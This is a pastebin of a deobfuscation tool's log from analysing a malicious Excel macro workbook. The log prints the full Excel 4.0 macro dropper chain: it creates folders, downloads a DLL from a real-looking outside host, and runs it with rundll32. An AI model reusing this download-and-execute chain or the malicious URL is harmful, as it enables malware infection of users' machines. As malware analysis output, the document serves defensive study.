Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- C:\Users\user\AppData\Local\Programs\Python\Python36-32\python.exe C:/Users/user/Downloads/last/XLMMacroDeobfuscator_new/XLMMacroDeobfuscator/deobfuscator.py -f C:\Users\user\Downloads\tests-xlm\test2.xlsb
- _ _______
- |\ /|( \ ( )
- ( \ / )| ( | () () |
- \ (_) / | | | || || |
- ) _ ( | | | |(_)| |
- / ( ) \ | | | | | |
- ( / \ )| (____/\| ) ( |
- |/ \|(_______/|/ \|
- ______ _______ _______ ______ _______ _______ _______ _______ _________ _______ _______
- ( __ \ ( ____ \( ___ )( ___ \ ( ____ \|\ /|( ____ \( ____ \( ___ )\__ __/( ___ )( ____ )
- | ( \ )| ( \/| ( ) || ( ) )| ( \/| ) ( || ( \/| ( \/| ( ) | ) ( | ( ) || ( )|
- | | ) || (__ | | | || (__/ / | (__ | | | || (_____ | | | (___) | | | | | | || (____)|
- | | | || __) | | | || __ ( | __) | | | |(_____ )| | | ___ | | | | | | || __)
- | | ) || ( | | | || ( \ \ | ( | | | | ) || | | ( ) | | | | | | || (\ (
- | (__/ )| (____/\| (___) || )___) )| ) | (___) |/\____) || (____/\| ) ( | | | | (___) || ) \ \__
- (______/ (_______/(_______)|/ \___/ |/ (_______)\_______)(_______/|/ \| )_( (_______)|/ \__/
- XLMMacroDeobfuscator(v0.1.6) - https://github.com/DissectMalware/XLMMacroDeobfuscator
- File: C:\Users\user\Downloads\tests-xlm\test2.xlsb
- Unencrypted xlsb file
- [Loading Cells]
- auto_open: auto_open->jf!$T$73
- [Starting Deobfuscation]
- CELL:T73 , FullEvaluation , $GU$614()
- CELL:GU614 , FullEvaluation , SET.NAME(wnzddroibxuqpv,http://liveswindow.casa/opzi0n1.dll)
- CELL:GU615 , FullEvaluation , SET.NAME(rcguqsbkfjzr,$BB$54)
- CELL:GU616 , FullEvaluation , $AU$259()
- CELL:AU259 , FullEvaluation , FORMULA(http://liveswindow.casa/opzi0n1.dll,$BB$54)
- CELL:GU617 , FullEvaluation , RUN(jf!BV2537)
- CELL:BV2537 , FullEvaluation , SET.NAME(wnzddroibxuqpv,C:\DlkYKlI\UiQhTXx\sncwner.dll,DllRegisterServer)
- CELL:BV2538 , FullEvaluation , SET.NAME(rcguqsbkfjzr,$R$1071)
- CELL:BV2539 , FullEvaluation , $AU$259()
- CELL:AU259 , FullEvaluation , FORMULA(C:\DlkYKlI\UiQhTXx\sncwner.dll,DllRegisterServer,$R$1071)
- CELL:BV2540 , FullEvaluation , RUN(jf!EB1002)
- CELL:EB1002 , FullEvaluation , SET.NAME(wnzddroibxuqpv,C:\DlkYKlI\UiQhTXx\sncwner.dll)
- CELL:EB1003 , FullEvaluation , SET.NAME(rcguqsbkfjzr,$H$2491)
- CELL:EB1004 , FullEvaluation , $AU$259()
- CELL:AU259 , FullEvaluation , FORMULA(C:\DlkYKlI\UiQhTXx\sncwner.dll,$H$2491)
- CELL:EB1005 , FullEvaluation , RUN(jf!FH2455)
- CELL:FH2455 , FullEvaluation , SET.NAME(wnzddroibxuqpv,URLMON)
- CELL:FH2456 , FullEvaluation , SET.NAME(rcguqsbkfjzr,$IE$1801)
- CELL:FH2457 , FullEvaluation , $AU$259()
- CELL:AU259 , FullEvaluation , FORMULA(URLMON,$IE$1801)
- CELL:FH2458 , FullEvaluation , RUN(jf!EN2907)
- CELL:EN2907 , FullEvaluation , SET.NAME(wnzddroibxuqpv,URLDownloadToFileA)
- CELL:EN2908 , FullEvaluation , SET.NAME(rcguqsbkfjzr,$FM$1658)
- CELL:EN2909 , FullEvaluation , $AU$259()
- CELL:AU259 , FullEvaluation , FORMULA(URLDownloadToFileA,$FM$1658)
- CELL:EN2910 , FullEvaluation , RUN(jf!FM695)
- CELL:FM695 , FullEvaluation , SET.NAME(wnzddroibxuqpv,JJCCJJ)
- CELL:FM696 , FullEvaluation , SET.NAME(rcguqsbkfjzr,$HN$989)
- CELL:FM697 , FullEvaluation , $AU$259()
- CELL:AU259 , FullEvaluation , FORMULA(JJCCJJ,$HN$989)
- CELL:FM698 , FullEvaluation , RUN(jf!BH797)
- CELL:BH797 , FullEvaluation , SET.NAME(wnzddroibxuqpv,Shell32)
- CELL:BH798 , FullEvaluation , SET.NAME(rcguqsbkfjzr,$GW$1910)
- CELL:BH799 , FullEvaluation , $AU$259()
- CELL:AU259 , FullEvaluation , FORMULA(Shell32,$GW$1910)
- CELL:BH800 , FullEvaluation , RUN(jf!ED1009)
- CELL:ED1009 , FullEvaluation , SET.NAME(wnzddroibxuqpv,ShellExecuteA)
- CELL:ED1010 , FullEvaluation , SET.NAME(rcguqsbkfjzr,$DL$2966)
- CELL:ED1011 , FullEvaluation , $AU$259()
- CELL:AU259 , FullEvaluation , FORMULA(ShellExecuteA,$DL$2966)
- CELL:ED1012 , FullEvaluation , RUN(jf!IC1996)
- CELL:IC1996 , FullEvaluation , SET.NAME(wnzddroibxuqpv,JJCCCCJ)
- CELL:IC1997 , FullEvaluation , SET.NAME(rcguqsbkfjzr,$CS$251)
- CELL:IC1998 , FullEvaluation , $AU$259()
- CELL:AU259 , FullEvaluation , FORMULA(JJCCCCJ,$CS$251)
- CELL:IC1999 , FullEvaluation , RUN(jf!GT1898)
- CELL:GT1898 , FullEvaluation , SET.NAME(wnzddroibxuqpv,Open)
- CELL:GT1899 , FullEvaluation , SET.NAME(rcguqsbkfjzr,$HD$2170)
- CELL:GT1900 , FullEvaluation , $AU$259()
- CELL:AU259 , FullEvaluation , FORMULA(Open,$HD$2170)
- CELL:GT1901 , FullEvaluation , RUN(jf!T2783)
- CELL:T2783 , FullEvaluation , SET.NAME(wnzddroibxuqpv,regsvr32.exe)
- CELL:T2784 , FullEvaluation , SET.NAME(rcguqsbkfjzr,$Z$2857)
- CELL:T2785 , FullEvaluation , $AU$259()
- CELL:AU259 , FullEvaluation , FORMULA(regsvr32.exe,$Z$2857)
- CELL:T2786 , FullEvaluation , RUN(jf!DD1093)
- CELL:DD1093 , FullEvaluation , SET.NAME(wnzddroibxuqpv,rundll32.exe)
- CELL:DD1094 , FullEvaluation , SET.NAME(rcguqsbkfjzr,$FB$2223)
- CELL:DD1095 , FullEvaluation , $AU$259()
- CELL:AU259 , FullEvaluation , FORMULA(rundll32.exe,$FB$2223)
- CELL:DD1096 , FullEvaluation , RUN(jf!HK1793)
- CELL:HK1793 , FullEvaluation , SET.NAME(wnzddroibxuqpv,C:\DlkYKlI)
- CELL:HK1794 , FullEvaluation , SET.NAME(rcguqsbkfjzr,$IM$373)
- CELL:HK1795 , FullEvaluation , $AU$259()
- CELL:AU259 , FullEvaluation , FORMULA(C:\DlkYKlI,$IM$373)
- CELL:HK1796 , FullEvaluation , RUN(jf!HM2293)
- CELL:HM2293 , FullEvaluation , SET.NAME(wnzddroibxuqpv,C:\DlkYKlI\UiQhTXx)
- CELL:HM2294 , FullEvaluation , SET.NAME(rcguqsbkfjzr,$BB$248)
- CELL:HM2295 , FullEvaluation , $AU$259()
- CELL:AU259 , FullEvaluation , FORMULA(C:\DlkYKlI\UiQhTXx,$BB$248)
- CELL:HM2296 , FullEvaluation , RUN(jf!GA2355)
- CELL:GA2355 , FullEvaluation , SET.NAME(wnzddroibxuqpv,Kernel32)
- CELL:GA2356 , FullEvaluation , SET.NAME(rcguqsbkfjzr,$FR$295)
- CELL:GA2357 , FullEvaluation , $AU$259()
- CELL:AU259 , FullEvaluation , FORMULA(Kernel32,$FR$295)
- CELL:GA2358 , FullEvaluation , RUN(jf!GT2897)
- CELL:GT2897 , FullEvaluation , SET.NAME(wnzddroibxuqpv,CreateDirectoryA)
- CELL:GT2898 , FullEvaluation , SET.NAME(rcguqsbkfjzr,$GL$2952)
- CELL:GT2899 , FullEvaluation , $AU$259()
- CELL:AU259 , FullEvaluation , FORMULA(CreateDirectoryA,$GL$2952)
- CELL:GT2900 , FullEvaluation , RUN(jf!HO2319)
- CELL:HO2319 , FullEvaluation , SET.NAME(wnzddroibxuqpv,JCJ)
- CELL:HO2320 , FullEvaluation , SET.NAME(rcguqsbkfjzr,$EQ$7)
- CELL:HO2321 , FullEvaluation , $AU$259()
- CELL:AU259 , FullEvaluation , FORMULA(JCJ,$EQ$7)
- CELL:HO2322 , FullEvaluation , RUN(jf!R450)
- CELL:R450 , FullEvaluation , SET.NAME(wnzddroibxuqpv,INSENG)
- CELL:R451 , FullEvaluation , SET.NAME(rcguqsbkfjzr,$GA$816)
- CELL:R452 , FullEvaluation , $AU$259()
- CELL:AU259 , FullEvaluation , FORMULA(INSENG,$GA$816)
- CELL:R453 , FullEvaluation , RUN(jf!H1261)
- CELL:H1261 , FullEvaluation , SET.NAME(wnzddroibxuqpv,DownloadFile)
- CELL:H1262 , FullEvaluation , SET.NAME(rcguqsbkfjzr,$AQ$2363)
- CELL:H1263 , FullEvaluation , $AU$259()
- CELL:AU259 , FullEvaluation , FORMULA(DownloadFile,$AQ$2363)
- CELL:H1264 , FullEvaluation , RUN(jf!HT202)
- CELL:HT202 , FullEvaluation , SET.NAME(wnzddroibxuqpv,BCCJ)
- CELL:HT203 , FullEvaluation , SET.NAME(rcguqsbkfjzr,$IG$1852)
- CELL:HT204 , FullEvaluation , $AU$259()
- CELL:AU259 , FullEvaluation , FORMULA(BCCJ,$IG$1852)
- CELL:HT205 , FullEvaluation , RUN(jf!CI2596)
- CELL:CI2596 , FullEvaluation , SET.NAME(wnzddroibxuqpv,uOIxdmml)
- CELL:CI2597 , FullEvaluation , SET.NAME(rcguqsbkfjzr,$HF$2029)
- CELL:CI2598 , FullEvaluation , $AU$259()
- CELL:AU259 , FullEvaluation , FORMULA(uOIxdmml,$HF$2029)
- CELL:CI2599 , FullEvaluation , RUN(jf!GH2231)
- CELL:GH2231 , FullEvaluation , SET.NAME(wnzddroibxuqpv,ePIPtHGW)
- CELL:GH2232 , FullEvaluation , SET.NAME(rcguqsbkfjzr,$EP$1509)
- CELL:GH2233 , FullEvaluation , $AU$259()
- CELL:AU259 , FullEvaluation , FORMULA(ePIPtHGW,$EP$1509)
- CELL:GH2234 , FullEvaluation , RUN(jf!A2105)
- CELL:A2105 , FullEvaluation , SET.NAME(wnzddroibxuqpv,SVNmBteM)
- CELL:A2106 , FullEvaluation , SET.NAME(rcguqsbkfjzr,$CQ$2243)
- CELL:A2107 , FullEvaluation , $AU$259()
- CELL:AU259 , FullEvaluation , FORMULA(SVNmBteM,$CQ$2243)
- CELL:A2108 , FullEvaluation , $T$74()
- CELL:T74 , FullEvaluation , CALL("Kernel32","CreateDirectoryA","JCJ","C:\DlkYKlI",0)
- CELL:T75 , FullEvaluation , CALL("Kernel32","CreateDirectoryA","JCJ","C:\DlkYKlI\UiQhTXx",0)
- CELL:T77 , FullEvaluation , CALL("URLMON","URLDownloadToFileA","JJCCJJ",0,"http://liveswindow.casa/opzi0n1.dll","C:\DlkYKlI\UiQhTXx\sncwner.dll",0,0)
- CELL:T79 , FullEvaluation , IF($T$78<>0)
- CELL:T80 , FullEvaluation , CALL("INSENG","DownloadFile","BCCJ","http://liveswindow.casa/opzi0n1.dll","C:\DlkYKlI\UiQhTXx\sncwner.dll",1)
- CELL:T82 , FullEvaluation , END.IF
- CELL:T84 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCCJ",0,"Open","rundll32.exe","C:\DlkYKlI\UiQhTXx\sncwner.dll,DllRegisterServer",0,0)
- CELL:T87 , End , HALT()
- Files:
- [END of Deobfuscation]
- time elapsed: 1.1293022632598877
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement